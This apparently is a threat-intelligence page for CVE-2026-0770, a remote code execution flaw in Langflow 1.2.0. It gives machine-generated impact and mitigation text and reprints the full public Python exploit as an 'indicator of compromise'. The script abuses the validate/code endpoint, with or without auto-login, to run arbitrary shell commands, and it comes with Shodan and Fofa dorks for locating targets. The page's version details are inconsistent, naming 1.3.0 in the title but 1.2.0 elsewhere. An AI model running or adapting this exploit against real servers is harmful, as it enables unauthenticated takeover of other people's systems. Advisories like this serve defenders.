Langflow 1.3.0 - Remote Code Execution
Langflow version 1. 2. 0 contains a critical remote code execution vulnerability identified as CVE-2026-0770. This vulnerability allows an attacker to execute arbitrary code remotely on affected systems running Langflow 1. 2. 0. Exploit code is publicly available in Python, increasing the risk of exploitation. The vulnerability affects Debian platforms running this version of Langflow. No official patch or remediation guidance is currently provided.
AI Analysis
Technical Summary
CVE-2026-0770 is a remote code execution vulnerability affecting Langflow version 1.2.0, an application hosted at https://github.com/langflow-ai/langflow. The vulnerability allows remote attackers to execute arbitrary code on systems running this version. The exploit code is publicly available and written in Python. The affected platform is Debian. There is no indication of an official patch or vendor advisory at this time. The vulnerability is classified as critical due to the nature of remote code execution.
Potential Impact
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code remotely on the affected system, potentially leading to full system compromise. This poses a critical risk to confidentiality, integrity, and availability of the affected systems.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider restricting access to Langflow 1.2.0 instances and monitoring for suspicious activity. Avoid deploying this version in production environments.
Indicators of Compromise
- exploit-code: # Exploit Title: Langflow 1.3.0 - Remote Code Execution # Fofa-dork: title="Langflow" # Shodan-dork: title:"Langflow" # Date: 23-05-2026 # Exploit Author: Diamorphine # Venodor Homepage: https://www.langflow.org/ # Software Link: https://github.com/langflow-ai/langflow # Version: 1.2.0 # Tested on: Debian # CVE : CVE-2026-0770 # Description: Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere in the exec_globals parameter at the validate endpoint, letting remote attackers execute arbitrary code as root, exploit requires no authentication. # Usage: CVE-2026-0770.py -u 127.0.0.1 [-l USERNAME] [-p PASSWORD] [-c COMMAND] import httpx import asyncio import subprocess import json import sys import argparse def auth(host, username, password): with httpx.Client(verify=False) as client: data = { 'username': username, 'password': password } r = client.post(url=f'http://{host}:7860/api/v1/login', data=data) res = r.json() access_token = res["access_token"] return access_token async def exec_auth(host, username, password, cmd): async with httpx.AsyncClient(verify=False) as client: headers = { 'Authorization': f'Bearare {auth(host, username, password)}' } data = { "code":"\ndef exploit(\n _=( lambda r: (_ for _ in ()).throw(Exception(f\"{r.stdout}{r.stderr}\")) )(\n __import__('subprocess').run('%s', shell=True, capture_output=True, text=True)\n )\n):\n pass\n" % cmd } r = await client.post(url=f'http://{host}:7860/api/v1/validate/code', headers=headers, json=data) r_out = r.text output = json.loads(r_out) value = output['function'] try: print(value['errors'][0]) except IndexError: print("Index out of range") async def exec_without_auth(host, cmd): async with httpx.AsyncClient(verify=False) as client: req = await client.get(url=f'http://{host}:7860/api/v1/auto_login') res = req.json() access_token = res["access_token"] headers = { 'Authorization': f'Bearare {access_token}' } data = { "code":"\ndef exploit(\n _=( lambda r: (_ for _ in ()).throw(Exception(f\"{r.stdout}{r.stderr}\")) )(\n __import__('subprocess').run('%s', shell=True, capture_output=True, text=True)\n )\n):\n pass\n" % cmd } r = await client.post(url=f'http://{host}:7860/api/v1/validate/code', headers=headers, json=data) r_out = r.text output = json.loads(r_out) value = output['function'] try: print(value['errors'][0]) except IndexError: print("Index out of range") parser = argparse.ArgumentParser(description="Exploit for CVE-2026-0770 – Unauthenticated RCE in Langflow") parser.add_argument('-u', '--host', required=True, help="Target host, e.g 127.0.0.1") parser.add_argument('-l', '--login', help="Username for login, e.g user (If auto login not enabled)") parser.add_argument('-p', '--password', help="Password for login, e.g password (If auto login not enabled)") parser.add_argument('-c', '--command', default='id', help="Command for execute, e.g id, default: id") args = parser.parse_args() if args.login and args.password: asyncio.run(exec_auth(args.host, args.login, args.password, args.command)) else: asyncio.run(exec_without_auth(args.host, args.command))
Langflow 1.3.0 - Remote Code Execution
Description
Langflow version 1. 2. 0 contains a critical remote code execution vulnerability identified as CVE-2026-0770. This vulnerability allows an attacker to execute arbitrary code remotely on affected systems running Langflow 1. 2. 0. Exploit code is publicly available in Python, increasing the risk of exploitation. The vulnerability affects Debian platforms running this version of Langflow. No official patch or remediation guidance is currently provided.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
CVE-2026-0770 is a remote code execution vulnerability affecting Langflow version 1.2.0, an application hosted at https://github.com/langflow-ai/langflow. The vulnerability allows remote attackers to execute arbitrary code on systems running this version. The exploit code is publicly available and written in Python. The affected platform is Debian. There is no indication of an official patch or vendor advisory at this time. The vulnerability is classified as critical due to the nature of remote code execution.
Potential Impact
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code remotely on the affected system, potentially leading to full system compromise. This poses a critical risk to confidentiality, integrity, and availability of the affected systems.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider restricting access to Langflow 1.2.0 instances and monitoring for suspicious activity. Avoid deploying this version in production environments.
Technical Details
- Cve
- CVE-2026-0770
- Version
- 1.2.0
- Application
- https://github.com/langflow-ai/langflow
- Author
- Diamorphine
- Platform
- Debian
- Edb Id
- 52597
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Langflow 1.3.0 - Remote Code Execution
# Exploit Title: Langflow 1.3.0 - Remote Code Execution # Fofa-dork: title="Langflow" # Shodan-dork: title:"Langflow" # Date: 23-05-2026 # Exploit Author: Diamorphine # Venodor Homepage: https://www.langflow.org/ # Software Link: https://github.com/langflow-ai/langflow # Version: 1.2.0 # Tested on: Debian # CVE : CVE-2026-0770 # Description: Langflow contains a remote code execution caused by inclusion of functionality from untrusted control sphere in the exec_globals parameter at the validat... (3056 more characters)
Threat ID: 6a1a0debe29bf47b5017f5ba
Added to database: 5/29/2026, 10:06:35 PM
Last enriched: 5/29/2026, 10:06:50 PM
Last updated: 5/29/2026, 10:06:55 PM
Views: 1
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.